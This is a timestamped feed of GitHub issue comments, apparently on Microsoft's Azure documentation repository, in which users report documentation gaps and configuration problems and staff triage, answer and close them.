Thanks for the response..I am able to see only Pipelines an Datasets option after creating ADF v2

[2019-02-22 09:27] bhavya-dhingra commented on #16848
Getting unauthorized access after successfully running the code.

[2019-02-22 09:36] CHEEKATLAPRADEEP-MSFT commented on #25519
@VidyaSalimath Thank you for reverting back. Since your subscription is not whitelisted for Azure Data Flows that might be the reason you are not able to see. Please fill out this form to request ADF Data Flows.

The Data Flow feature in ADF is currently in limited preview. If you would like to try this out on your Data Factories, please fill out this form to request whitelisting your Azure Subscr

[2019-02-22 09:36] anil-kapoor opened #25534 "Cassandra API Account not accessible behind Firewalls"
While creating connection to Cassandra API Account, getting HostUnavailableException
This should be achievable by setting proxy host port & credentials.
But in current API i don't see a way to do this.
I think this should be the first thing to fix for any corporate users.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID:

[2019-02-22 09:37] femsulu commented on #25211
@MGoedtel Is this currently supported? if yes, do we have steps to generate email alerts from this solution?

[2019-02-22 09:39] RohitMungi-MSFT commented on #25490
@bbartling I think this [article ](https://docs.microsoft.com/en-us/azure/machine-learning/studio-module-reference/convert-to-csv) might help you where you can download to CSV from ML studio.

[2019-02-22 09:41] GuyHarwood commented on #18379
I notice that 'web app for containers' app services do not have the remote debugging switch under application settings blade, but the ports are still open.  Obviously my container only listens on a specific port, but i need to understand if anything internal is potentially still listening, as our penetration testers need confirmation before sign off.

[2019-02-22 09:48] saketkashyap opened #25536 "Not able to list the nodes"
I already had a Kubectl.exe, but i still downloaded from the "az aks install-cli" and added the path to kubectl.exe to path variable. I am facing the below issue
command - kubectl get nodes
issue - Unable to connect to the server: x509: certificate signed by unknown authority

I have verified the config file under .kube folder and it seems to be fine. The version of the kubectl that got downloaded

[2019-02-22 09:53] femsulu commented on #25280
@taromielnaz This channel is reserved for documentation related questions. For best response, kindly raise an Azure Billing support to get per-app breakdown at no cost - use [these steps](https://docs.microsoft.com/en-us/azure/azure-supportability/how-to-create-azure-support-request) to raise a support ticket. If you have any follow up questions, please send mail to Azcommunity@microsoft.com with

[2019-02-22 09:53] #25280 closed

[2019-02-22 09:55] femsulu commented on #25216
Thanks for the response @Sogup.

@viroikhm
We will now close this issue. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-22 09:55] #25216 closed

[2019-02-22 10:05] Maelito77 commented on #18542
Hi
How can I remove Direct licensing from a set of users (as a test) using Powershell script before I do it for the whole enterprise?
Thanks, M

[2019-02-22 10:18] ManojReddy-MSFT commented on #25297
@vikher I am checking in to see if the above answer was helpful. Let me know if you have any other questions.

[2019-02-22 10:19] saketkashyap commented on #25536
Closing the issue- issue was with the firewall within  my organization. Connected to the public wifi and was able to run the command and get the values.

[2019-02-22 10:19] #25536 closed

[2019-02-22 10:20] VidyaSalimath commented on #25519
Thank you..how much time does it take to enable?

[2019-02-22 10:22] anetschka opened #25538 "Documentation on setting up web job with separate configurations for development and production"
Hi, I cannot find any documentation on how to set up the web job with separate configurations for different development states. I tried to achieve this by reading separate json files into IConfigurationRoot and then putting this object into IConfigurationBuilder.AddConfiguration(). However, this will not read my connection strings from my appsettings.dev.json. So what happens in the AddConfigurati

[2019-02-22 10:22] ManojReddy-MSFT commented on #25026
@mcurko I have checked with other resources as well and we are not able to reproduce the issue. I will pass this as feedback to the product team to get their thoughts and will update here if there is an issue regarding this.

Thank you for sharing the feedback with us. I will now close this thread.

[2019-02-22 10:22] #25026 closed

[2019-02-22 10:24] Rookian opened #25539 "Is it possible to automatically create SendGrid Account?"
I want to create a SendGrid Account automatically, because we have different environments and we don't want to manually create SendGrid Accounts.

Is there a way to automatically create a SendGrid account(?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 73d91616-a93f-84af-7900-5aa34b361ffd
* Version Independent ID: f20

[2019-02-22 10:37] CHEEKATLAPRADEEP-MSFT commented on #25519
@kromerm Could you please help @VidyaSalimath to enable ADF data flow option?

[2019-02-22 10:44] olileger opened #25540 "BadRequest : Invalid capability string"
Hello

I'm having an ARM template deployment error : "BadRequest : Invalid capability string"
This error doesn't seems to be documented, any idea ?

Thanks

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: a114cf0c-a1a0-f73d-f8d2-0f16d62b1e86
* Version Independent ID: 203548b7-824f-eb7a-ca5b-e4cfec2c6d51
* Content: [Troub

[2019-02-22 10:46] #25372 closed

[2019-02-22 10:53] jakaruna-MSFT commented on #25019
Please send your subscription id to the email  AzCommunity@microsoft.com .
We can get a free one time support ticket to engage Azure support.

[2019-02-22 10:55] femsulu commented on #25394
Adding @genlin and @dougeby for visibility + doc enhancement considerations.

[2019-02-22 11:05] jakaruna-MSFT commented on #25165
I will close this out for now. If you need additional help please let me know and we can reopen and continue.

[2019-02-22 11:05] #25165 closed

[2019-02-22 11:05] trinadhkotturu commented on #19814
I made and signed off on the corresponding change to docs. @please-close

[2019-02-22 11:05] trinadhkotturu commented on #19814
#please-close

[2019-02-22 11:07] romankiss commented on #25461
@DixitArora-MSFT see the following link https://azure.microsoft.com/en-us/blog/more-reliable-event-driven-applications-in-azure-with-an-updated-event-grid/

[2019-02-22 11:14] msrini-MSIT commented on #24919
@richpowell, it should work fine with Free Trial. There are no dependency with Free trail as such. It seems to be an more specific issue with your environment. Can you please post your query over MSDN ?

Here is the link : https://social.msdn.microsoft.com/Forums/en-US/home?forum=WAVirtualMachinesVirtualNetwork

I will go ahead and close this issue. Reopen if you have any further questions.

[2019-02-22 11:14] #24919 closed

[2019-02-22 11:15] msrini-MSIT commented on #24920
@ramadarla , I will go ahead and close this issue as of now. Please reopen if you have any further questions.

[2019-02-22 11:15] #24920 closed

[2019-02-22 11:17] MikkelHegn commented on #25404
Looks like this came in as part of a bigger change set when we decommissioned Party Clusters, and is a default paragraph for creating clusters: https://github.com/MicrosoftDocs/azure-docs/commit/cb8ad5393db702a0d494da6dd0a40c2e4c780baa

The main thing is that if Docker is not running when creating a local cluster, the cluster will not enable container features, and you will have to recreate the cl

[2019-02-22 11:18] v-makoud opened #25701 "M35454: Possible source error: are added VMs meant to be excluded"
Hello @georgewallace,
Translator has reported possible source content issue.
Link to Github file: https://github.com/MicrosoftDocs/azure-docs-pr/blob/master/articles/automation/automation-solution-vm-management.md
Row where the issue is located: 206
Comment: There seems to be something wrong with source text. Could you please paraphrase it? Thanks!

Can you please review the comment and provide an

[2019-02-22 11:20] femsulu commented on #25454
Hi @Charmendar, as stated in the [referenced doc](https://docs.microsoft.com/en-us/azure/billing/billing-how-to-cancel-azure-subscription#what-happens-after-i-cancel-my-subscription), once you cancel your subscription, all billing is stopped which means you will no longer be charged - takes about 10 mins for the cancellation request to complete. Your resources/services are removed e.g. VMs are dea

[2019-02-22 11:20] femsulu commented on #25454
We will now close this issue. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-22 11:20] #25454 closed

[2019-02-22 11:26] trinadhkotturu commented on #20008
#please-close

[2019-02-22 11:54] Lemraj opened #25541 "Broken link ()"
Found on page:
https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/azure-resource-manager/grant-access-to-create-subscription.md

Paragraph:
https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/azure-resource-manager/grant-access-to-create-subscription.md#audit-who-created-subscriptions-using-activity-logs

The link behind the text **"elevate access"** (https://github.com/

[2019-02-22 12:16] bbartling commented on #25490
Thanks this issue can be closed

Sent from my iPhone

On Feb 22, 2019, at 3:39 AM, RohitMungi-MSFT <notifications@github.com<mailto:notifications@github.com>> wrote:

@bbartling<https://github.com/bbartling> I think this article <https://docs.microsoft.com/en-us/azure/machine-learning/studio-module-reference/convert-to-csv> might help you where you can download to CSV from ML studio.

—
You are re

[2019-02-22 12:20] kirantsp commented on #24474
Hi All, Thank you everyone for having the issue addressed...I have uninstalled the previous version of knife-azure (1.8.7) and installed the latest version (1.9.0) as shown in the below screenshot...I am able to issue knife-azure commands now and able to create the VM successfully...

![capture](https://user-images.githubusercontent.com/31441411/53241031-43af4680-3698-11e9-9752-c3d0daecc8c9.PNG)

[2019-02-22 12:50] taranais opened #25542 "Run batch predictions from c#"
I wish to run a batch predictions from c# but there is no sample for this case.

I used sample code from Consume in real-time sample, but i cant generate the key on run time from c#.

How do i get this token in c#?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: cba5b9a4-a146-337c-f644-1de665144fcd
* Version Independent

[2019-02-22 12:53] sybrenstuvel opened #25543 "Missing info on how to determine resource identifier of current VM"
The `Resources` property contains a list of resource IDs. However, there is no indication as to how to know that resource ID. For example, how does a Azure Batch pool node know which is its own resource ID?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 479d877a-81a0-5436-76d9-898303c5bbec
* Version Independent ID: f35

[2019-02-22 13:07] wesmc7777 commented on #25347
@o-lazzarino-reply Thank you very much for reporting this. I'll be fixing this very shortly. I'm sorry for the frustration this caused you.

[2019-02-22 13:11] oxsmose opened #25544 "Download model issue"
In the download model part of the code:

from azureml.core import Workspace
from azureml.core.model import Model
import os
ws = Workspace.from_config()
model=Model(ws, 'sklearn_mnist')

model.download(target_dir=os.getcwd(), exist_ok=True)

# verify the downloaded model file
file_path = os.path.join(os.getcwd(), "sklearn_mnist_model.pkl")

os.stat(file_path)

I got "AzureMLException: No files to d

[2019-02-22 13:21] love2dishtech commented on #14983
Hi @Karishma-Tiwari-MSFT,

I am following this issue from various closed issues and it appears that there is no solution available for this. Any idea if a fix has been proposed for this?

[2019-02-22 13:36] PramodValavala-MSFT commented on #25491
@theangellmethod You are right. Apart from the templates available, I believe there isn't any documentation for IoT Hub (mostly because they just use the Event Hub triggers due to their relationship)

We have assigned this issue to the content author to review and enhance the documentation accordingly as required.

[2019-02-22 13:56] mikecasas commented on #13151
@MichaelHauss  I think it would be helpful to mention needing the custom endpoint earlier in the docs. I read the need to point to the web endpoint and not to the storage/blob endpoint, but it wasn't clear that I had to change the "Origin Type" from "Storage" to "Custom origin".

https://github.com/MicrosoftDocs/azure-docs/issues/13151#issuecomment-411840149

[2019-02-22 14:06] andrewdmoreno commented on #25285
@vikramdadwal While we wait for a response on your question do you mind sharing in more detail what you were able to configure? I'm also following this conversation to see the options available for accomplishing this.

[2019-02-22 14:15] czajek opened #25545 "API type"
Does this article describes only indexing for Core SQL API? I'm bit confused when it comes to indexing for table API, is it the same mechanism?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: a32753f5-3b8a-c8cc-7a2f-58773b727e0d
* Version Independent ID: 1eef2e5d-9f62-824f-ebc6-8aee6544a8cc
* Content: [Indexing in Azure

[2019-02-22 14:19] jtuliani opened #25546 "Capacity?"
Doc says max usable capacity is 80TB. The Azure Portal and the product page say 100TB. So which is it? If the raw capacity is 100TB and the usable capacity is 80TB, then that needs to be explained clearly and explicitly.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 7a4d5141-d418-1a30-a39f-1793591e6750
* Version Indep

[2019-02-22 14:20] diberry commented on #25294
@Gariantroll - thank you for posting your answer. #please-close

[2019-02-22 14:21] diberry commented on #25037
#in-progress

[2019-02-22 14:23] diberry commented on #24848
@AndyCW I've updated [the doc](https://docs.microsoft.com/en-us/azure/cognitive-services/LUIS/luis-concept-best-practices#phrase-lists) with your suggested sentence with slight edits. #please-close

[2019-02-22 14:24] diberry commented on #24847
@AndyCW - please review [the doc](https://docs.microsoft.com/en-us/azure/cognitive-services/LUIS/luis-concept-best-practices#do-add-phrase-lists-and-patterns-in-later-iterations). I've updated the doc to address your concerns.

[2019-02-22 14:35] marroema commented on #9664
This is still an issue, documentation is not updated yet. Get-OBRecoverableItem cmdlet is not working. Please fix documentation.

[2019-02-22 14:43] vhorne commented on #24208
@jimdial Application Gateway v2 supports static VIPs.

[2019-02-22 14:46] vhorne commented on #17084
@ecaron X-Original-Host is now available for Application Gateway SKU v2.

#please-close

[2019-02-22 14:53] #25545 closed

[2019-02-22 14:54] czajek commented on #25545
Documentation for table API describes the situation without auto indexing of secondary indexes, which confused me.

[2019-02-22 14:55] petenorth commented on #24643
Can some clarity be given around how traffic passes from the internet to Azure Web Apps (for Linux Containers) instances. How is traffic load balanced when the application when scaled? Is there any way (or is there any need) to encrypt traffic between the assumed load balancer and the Docker containers.

[2019-02-22 14:59] sergaz-msft commented on #25231
Hi @JihongL did you followed the recommendation above? Thanks.

[2019-02-22 15:02] VanMSFT commented on #24138
#please-close - Discussed with customer and they are working through Microsoft Support.

[2019-02-22 15:03] spelluru commented on #25427
@thala321 - please assign it to @ShubhaVijayasarathy. Thanks.

[2019-02-22 15:06] JinseGeerts commented on #17084
@vhorne Do we need to do a manual update now? Cause I'm still not seeing the header.

[2019-02-22 15:07] mrbullwinkle commented on #25528
A couple of quick thoughts on this one.

The Application Insights SDK and instrumentation is designed to be extremely lightweight and have minimal impact on the performance of your application. With that said, anytime you use a monitoring product or introduce change to a system or application there is a chance for some unforeseen interaction to occur which could negatively impact performance.

Wit

[2019-02-22 15:12] btm commented on #24474
1) You're missing a `-v` in your commands, and it happens to be doing the right thing because you only had one version to uninstall, and then you had wanted to install the latest version anyway. The commands would be:
[code]

2) `c:\chef` is more for system level configuration files, like if chef-client is running on the system to manage it. For user configuration files for tools like `knife` you

[2019-02-22 15:17] sbrian26 commented on #25281
Yes thank you, I did eventually reach that conclusion and subsequently discovered how to access blob storage from the http trigger; As a matter of fact, at this time, there's  not much documentation or example on how to access blob storage from an azure HTTP trigger function, my first notion was to just introduce the Storage Account via dependency injection in the function spec, this of course doe

[2019-02-22 15:17] #25281 closed

[2019-02-22 15:26] sumptersmartt opened #25547 "Internal DNS records for V2 SKU backend pools with end to end ssl"
If I understand the documentation correctly, I cannot use IP addresses for a backend pool and expect my web servers serving a computer name cert to work, as there is a name mismatch. Because of this, I want to use the FQDN of the VM (web01.internaldomain.com). My DNS Servers are currently located on the other side of a VPN gateway. I am able to use UDRs to point other subnets at this gateway, but

[2019-02-22 15:32] MadDenker opened #25548 "DSVM improvement - NLTK data download"
I noticed that the nltk python package was installed by default in the DSVM, but the nltk data is not downloaded.  The download is not difficult, but time consuming, and it would be excellent if the downloaded data was included in the DSVM package already.  Instructions here: https://www.nltk.org/data.html

[2019-02-22 15:34] jimdial commented on #24208
@pmgriffin Thanks for pointing it out. I've fixed the article so that it's accurate now (dynamic for AG V1 and static for AG V2). It will publish later today. #sign-off

[2019-02-22 15:37] cephalin commented on #25464
@paulhickman-a365 Thanks for your feedback. However I've already gone down the road of trying to use async instead and come up with a much more complicated code that in the end doesn't serve the clarity of the scenario itself and much harder to debug, and at then end not worth taking the customer down that road given what I'm actually trying to show them (App Service + Managed Identity + SQLDB). I

[2019-02-22 15:37] cephalin commented on #25464
#please-close

[2019-02-22 15:39] raghavan20 commented on #23265
I have tried setting `retryPolicy` on `IoTHubModuleClient` but I see the same effect as before (message not requeued / not sent again to the module).

**Logs on app startup**

[code]

**Relevant code from custom Consumer module**

[code]

[2019-02-22 15:53] cephalin commented on #5051
@janis91 I've added a Node.js code sample per your contribution. Thank you!

[2019-02-22 15:54] cephalin commented on #9057
@jonfinerty For simplicity of maintenance of the doc I've removed the commented out section. The update will be published in the next day. #please-close

[2019-02-22 15:54] sumptersmartt commented on #9769
"If you see a back-end health status of Unknown, ensure that access to the back end is not blocked by ... custom DNS in the virtual network."

Is custom DNS not supported for the backend pools? If the VNET uses user-defined DNS Servers, will the application gateway honor that? Is that not supported? I am confused by the wording of that note box.

[2019-02-22 15:55] cephalin commented on #7670
@tony-gutierrez I've added instructions on how to do it directly in the Cloud Shell with one command. The update should be published in the next day. #please-close

[2019-02-22 15:56] cephalin commented on #7670
@tony-gutierrez also sorry for the delay. I've changed the author to myself now so I should be able to see these issues sooner from now on.

[2019-02-22 16:02] tfitzmac commented on #25527
Yes, that is right. The built-in roles like Owner, Contributor, and Reader would work with the SendGrid resource provider. Otherwise, you could create a custom role. You can see the operations for a resource provider with:
az provider operation show --namespace Sendgrid.Email

Adding @rolyon - just in case I got some part of the RBAC description wrong.

[2019-02-22 16:03] tfitzmac commented on #25540
@olileger - what type of resource were you trying to deploy?

[2019-02-22 16:06] #7670 closed

[2019-02-22 16:15] olileger commented on #25540
Hello Tom
I faced this error when trying to deploy cosmos DB ARM template.
However since the creation of the issue I solved it by reworking the template itself (this was dependent of the resource provider).
I'll close the issue right now.
Thanks

[2019-02-22 16:17] sgoings commented on #25286
Walkthrough on the metric / dimensions here: https://github.com/Azure/azure-libraries-for-java/issues/563

[2019-02-22 16:25] josuvil opened #25549 "Password complexity and synchronized user accounts"
Hello,
Excellent article. I was wondering if we should add something additional on password complexity evaluation. With synchronized AD user accounts. the on-premises AD policies override AAD complexity policies. This being the case, it appears that if this feature is enabled, password protection is evaluated before on-premise AD password complexity policies. That does make sense. I just wonder if

[2019-02-22 16:37] bobbytreed commented on #16021
@mgreenegit - Can you verify this?

[2019-02-22 16:38] bobbytreed commented on #23128
@mgreenegit - Is this still an issue?

[2019-02-22 16:38] bobbytreed commented on #23322
@mgreenegit

[2019-02-22 16:38] bobbytreed commented on #24784
@mgreenegit

[2019-02-22 16:40] cephalin commented on #14667
@chrish619 To expedite making this info available to others I just added a link to it. The update should be published in the next few hours. #please-close

[2019-02-22 16:40] bobbytreed commented on #18076
@mgreenegit  - I think this leans towards adding back the extension docs

[2019-02-22 16:41] dlepow commented on #25060
@Karishma-Tiwari-MSFT - That sounds like the right approach. Can you please assign to me and I will address in the documentation? Thanks!

[2019-02-22 16:48] JasonWHowell commented on #24861
#please-close

[2019-02-22 16:49] toddgauntgs commented on #11194
Hi, was this functionality ever added?

[2019-02-22 16:59] kirtnoel opened #25553 "Allow Member Types instructions are unclear"
Dear Sir/Madam,
I find the appRoles instructions a bit unclear.  When these roles are defined one needs to include an id.   For the admin user above it indicates:

 "id": "1b4f816e-5eaf-48b9-8613-7923830595ad",

Where did this come from?

Thanks,
Kirt

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 5988a84f-de28-e2e4-f1

[2019-02-22 17:00] bobbytreed commented on #22480
closed by #67020

[2019-02-22 17:01] bobbytreed commented on #22480
#please-close

[2019-02-22 17:15] bobbytreed commented on #24410
@mgreenegit Looks like the Publish cmdlet requires a storage account name, but it does zip up the scripts automatically. The doc doesn't mention a storage account, do you think we need a new example?

[2019-02-22 17:22] zr-msft commented on #24193
@zer0big Fix is available here:
https://docs.microsoft.com/en-us/azure/virtual-machines/linux/tutorial-jenkins-github-docker-cicd#create-jenkins-instance

I updated the `cloud-init-jenkins.txt` file to fix the issue.

[2019-02-22 17:30] MicahMcKittrick-MSFT commented on #25536
@saketkashyap thanks for the update and closing out the issue. Glad you were able to resolve :)

[2019-02-22 17:31] rolyon commented on #25527
Yes, that is my understanding that these resource providers behave the same way as the Microsoft resource providers. You could use Owner, Contributor, or Reader, or you would need to create a custom role.

[2019-02-22 17:33] MicahMcKittrick-MSFT commented on #25543
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 17:34] cynthn commented on #24936
@rich-davies and @MicahMcKittrick-MSFT I figured out the proper way to do the service principal piece. They changed the way you create service principals and removed the option to supply your own password on creation. Here is what worked for me:

[code]
The output should be the auto-generated password that you can use it in the .json file for Packer. You can also see the service principal ID using

[2019-02-22 17:35] Mike-Ubezzi-MSFT commented on #25545
We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-22 17:39] Mike-Ubezzi-MSFT commented on #25534
@anil-kapoor There is a means to allow specific IP and IP range traffic to your Cassandra API instance in the Azure Portal. I want to check to see if you whitelisted your public IP you are attempting to connect from? Please take a look at the following if this confguration has not taken place: [Configure IP firewall in Azure Cosmos DB](https://docs.microsoft.com/en-us/azure/cosmos-db/how-to-config

[2019-02-22 17:40] adinunzio84 commented on #25060
I updated to 2.0.58 and still have the problem with the original query, but the null version does work for me.

[2019-02-22 17:48] MicahMcKittrick-MSFT commented on #25202
@sirdank just an FYI, @dragav is out of office this week so when he comes back next week we will get an answer to this.

[2019-02-22 17:53] MicahMcKittrick-MSFT commented on #25459
@Netdoc41 I will close this for now. If you have any other questions just let me know and we can always reopen and continue the discussion :)

[2019-02-22 17:53] #25459 closed

[2019-02-22 17:56] ggailey777 commented on #25281
@sbrian26 if your function accesses the same blob container, why not use a [Blob storage input binding](https://docs.microsoft.com/en-us/azure/azure-functions/functions-bindings-storage-blob#input---c-example)? The following is the definition for a compiled C# function that gets a value from the URL path (route) and uses that value as the name of a blob in a container:

[code]
The URL would look l

[2019-02-22 17:58] #24861 closed

[2019-02-22 17:58] fngyjx commented on #25241
One more change might in need:

Error: azurerm_public_ip.myterraformpublicip: expected allocation_method to be one of [Static Dynamic], got dynamic

After I changed like this : allocation_method = "Dynamic"
the error was gone

[2019-02-22 17:59] ajlam commented on #16418
@AndrewGJennings, closing this issue for now. Please reopen if you are still experiencing the issue.

#please-close

[2019-02-22 17:59] DrejmeisterDrej opened #25555 "New line character missing in code"
In the "Create a Virtual Machine Scale Set" code, the line following Set-AzureRmVmssStorageProfile is missing the new line character ( ` ). After &lt;-OsDiskCaching "None"&gt;

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 7d23a305-b076-4da6-dc80-9f7e03a78bc6
* Version Independent ID: 9cba1aaa-f0f4-bbb3-dd91-5f09764afa

[2019-02-22 18:05] Roblarson opened #25556 "Duplicate Identity protection (refreshed) content showing in the portal"
There are two Identity protection sections showing up under the How To Guides section.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 6fe2fc28-2c44-e088-f079-067bafd1ae58
* Version Independent ID: 6b987664-a403-4b79-4faa-eb4465c33a40
* Content: [Azure Active Directory Identity Protection](https://docs.microsoft.com/en-

[2019-02-22 18:09] MarkusVi commented on #25556
Hi @Roblarson, yes, this is on purpose. One is for the existing ("the older") version, and the other one is for the new refresh.

[2019-02-22 18:13] hansenms commented on #25553
It is a guid you generate. In PowerShell, you could use the `New-Guid` command and in bash, you can use `uuid`.

Please note that you only need to create a new resource application if you are deploying the Open Source FHIR server. If you are using the managed Azure API for FHIR, we have a first party one `https://azurehealthcareapis.com`.

If you are deploying the Open Source server, there are als

[2019-02-22 18:27] BryanTrach-MSFT commented on #25538
@anetschka Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:34] BryanTrach-MSFT commented on #25533
@squasta Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:40] Karishma-Tiwari-MSFT commented on #25060
Thanks @dlepow
@adinunzio84 Thanks for the feedback! I have assigned the issue to the content author to update the document as appropriate.

[2019-02-22 18:41] BryanTrach-MSFT commented on #25539
@Rookian You should be able to use the below ARM template guide. Whenever you need a sendgrid account, call the ARM template so that it can create a new account. You can cutout the web app and storage parts of the template since Sendgrid is not dependant on those services.

[https://anthonychu.ca/post/arm-template-storage-sendgrid/](url) (3rd party site)

We will now proceed to close this thread.

[2019-02-22 18:41] #25539 closed

[2019-02-22 18:42] SaurabhSharma-MSFT commented on #25549
@josuvil Thanks for the feedback !  I have assigned this issue to content author to investigate and update the document as appropriate.

[2019-02-22 18:43] Karishma-Tiwari-MSFT commented on #22480
@YvonneArnoldus Thanks for bringing this to our attention. We will now close this issue. If there are further questions regarding this matter, please tag me in a comment. I will reopen it and we will gladly continue the discussion.

[2019-02-22 18:43] #22480 closed

[2019-02-22 18:43] BryanTrach-MSFT commented on #25548
@MadDenker Can you please provide us with the Azure Doc URL that you are having issues with? We look forward to your reply.

[2019-02-22 18:46] BryanTrach-MSFT commented on #25541
@Lemraj Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:48] BryanTrach-MSFT commented on #25546
@jtuliani Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:49] YutongTie-MSFT commented on #25544
@oxsmose
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:49] YutongTie-MSFT commented on #25542
@taranais
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:51] BryanTrach-MSFT commented on #25525
@dcbrown16 Thanks for the feedback! We are currently investigating and will update you shortly.

@femsulu Technically Sendgrid is 3rd party but the question is closely related to RBAC. Can you take a look or determine if they need to contact Sendgrid support?

[2019-02-22 18:53] sergaz-msft commented on #25352
We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-22 18:53] #25352 closed

[2019-02-22 18:54] BryanTrach-MSFT commented on #25502
@mjuza Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:56] Karishma-Tiwari-MSFT commented on #14983
@love2dishtech This is the open issue: https://github.com/MicrosoftDocs/azure-docs/issues/23789
Further updates will be shared on that thread.

[2019-02-22 18:58] BryanTrach-MSFT commented on #25530
@PaulSells Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 18:59] mganeshphani commented on #25398
@MarileeTurscak-MSFT  I still appreciate if you can help me with this. currently looks like this documentation needs a revisit as its absolutely wrong..
logged a community ticket as well
https://community.powerbi.com/t5/Issues/Not-able-to-use-the-Azure-Active-Directory-Activity-Logs-content/idi-p/629989#M39372

[2019-02-22 19:00] BryanTrach-MSFT commented on #25532
@hmayer1980 Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 19:02] BryanTrach-MSFT commented on #25531
@daruizcorrea Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 19:03] BryanTrach-MSFT commented on #25490
@bbartling We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-22 19:03] #25490 closed

[2019-02-22 19:04] SaurabhSharma-MSFT commented on #25246
@blueelvis I do not believe there any limit on the number of keys/secrets/certificates, however, I will defer to the content author if that's not the case.
@barclayn Do you have any insights if any limitations.
Also, you may need to consider impact on the number of subsequent calls.  Please refer to [Azure Key Vault throttling guidance](https://docs.microsoft.com/en-us/azure/key-vault/key-vault-ov

[2019-02-22 19:07] tfitzmac commented on #25450
The update to the conceptual article has been published.
#please-close

[2019-02-22 19:10] tfitzmac commented on #25527
@dcbrown16 - hopefully that answers your question. If not, let us know.

[2019-02-22 19:10] tfitzmac commented on #25527
#please-close

[2019-02-22 19:14] ndondapati opened #25559 "Not part SQL Server Option"
why is it not part of the SQL server options in portal or db engine; and should go specifically to Power shell to do it?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: e1a62365-4312-8aad-d2f1-bb5c4184adf1
* Version Independent ID: 2ba5b809-8025-d7ee-c756-d6d1bab033fb
* Content: [Directing Azure traffic to Azure SQL Dat

[2019-02-22 19:15] SaurabhSharma-MSFT commented on #25250
@nkumars We will now proceed to close this thread. If there are further questions regarding this matter, please reopen it and we will gladly continue the discussion.

[2019-02-22 19:15] #25250 closed

[2019-02-22 19:15] SaurabhSharma-MSFT commented on #25261
@ld0614 We will now proceed to close this thread. If there are further questions regarding this matter, please reopen it and we will gladly continue the discussion.

[2019-02-22 19:15] #25261 closed

[2019-02-22 19:17] SaurabhSharma-MSFT commented on #25304
@Gold14388 Can you please help us with this information.

[2019-02-22 19:18] CelesteDG commented on #21416
Hello @kalyanimath - Our PM, @jmprieur , has updated the docs to align with the latest MSAL.NET release. These updates are now live. Thank you.

[2019-02-22 19:18] CelesteDG commented on #21416
Updated content is now live. #please-close

[2019-02-22 19:20] jaffadog opened #25560 "How is "Enterprise Application Owner" supposed to work in practice?"
When I make someone a "Enterprise Application Owner", and they try go to portal.azure.com to manage the one application I made them an owner of, they get "Access Denied" when they try navigate to the "Enterprise Apps" blade. This user has no AAD Admin Role. How are they supposed to administer the app that I have made them an owner of?

---
#### Document Details

⚠ *Do not edit this section. It is

[2019-02-22 19:24] alkohli commented on #25546
@jtuliani  Explained in the Data Box overview - https://docs.microsoft.com/en-us/azure/databox/data-box-overview#features-and-specifications. Copying here:

Storage capacity     100 TB device has 80 TB usable capacity after RAID 5 protection

[2019-02-22 19:25] Wicaeed commented on #10957
@davegreen Did you ever get the help you needed from MSFT in actually testing how the rules you have are trying to write will function on actual Workday data?

I'm somewhat in the same position, being a noob to the transform rules (but not regex in general), so I'm having trouble visualizing how changes in a transform rule will impact the fields I am trying to populate.

[2019-02-22 19:27] nacharya1 commented on #25501
@peteratwork you can deploy to Azure Container Instance (ACI) or Azure Kubernetes Service (AKS) using Azure Databricks. Documentation to do this can be found on the link below.
https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-deploy-and-where

[2019-02-22 19:32] vikramdadwal commented on #25285
@andrewdmoreno I was able to accomplish the following:

1. Create a Mesh project in VS2017
2. Create a basic Asp.Net Core API
3. Create secret in the mesh (I have to manually update the ARM json for the same. Check https://github.com/MicrosoftDocs/azure-docs/issues/25070
4. Bind Asp.NEt core to SSL certificate and listen on port 443 (Check this sample: https://cmatskas.com/enforcing-https-only-tra

[2019-02-22 19:33] SaurabhSharma-MSFT commented on #25341
@lightupdifire I believe there might be chances when you experience latency due to any kind of proxy solutions you introduce into your network connection and you might need to do some network topology tweaks to improve the speed.  Please refer to [Network topology considerations when using Azure Active Directory Application Proxy](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps

[2019-02-22 19:34] SaurabhSharma-MSFT commented on #25392
@joshtransient Thanks for the feedback !  I have assigned this issue to content author to investigate and update the document as appropriate.

[2019-02-22 19:43] tacc716 commented on #19151
